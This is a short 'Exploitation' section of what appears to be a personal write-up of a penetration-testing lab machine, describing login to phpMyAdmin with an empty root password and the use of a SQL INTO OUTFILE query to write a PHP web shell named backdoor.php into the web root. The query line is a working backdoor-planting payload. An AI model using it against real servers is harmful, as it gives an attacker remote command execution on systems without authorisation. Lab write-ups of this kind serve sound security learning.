Exploitation

After bypassing the proxy we gained access to a phpMyAdmin page with a empy password for the user root.

The page provided us with the perfect combination of things, phpmyinfo which would give us the directory names and locations in case we need to write into those files and a phpmyadmin that we can access.

Shell Uploading in Web Server through PhpMyAdmin - Hacking ArticlesHacking Articles

This guide allowed me to get a shell on phpmyadmin.

So we basically create a new table and we run a sql query like this one.

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:/wamp/www/backdoor.php"

The reason I chose that directory as I stated before was because I was able to see directory that the webserver was being hosted at. Alsoooo now i think I understand why the SQLi in Medjed worked the way it did because i see what the sqlquery in this case is doing as well.

PreviousWeb Services NextPriv Escalation

Last updated 2 years ago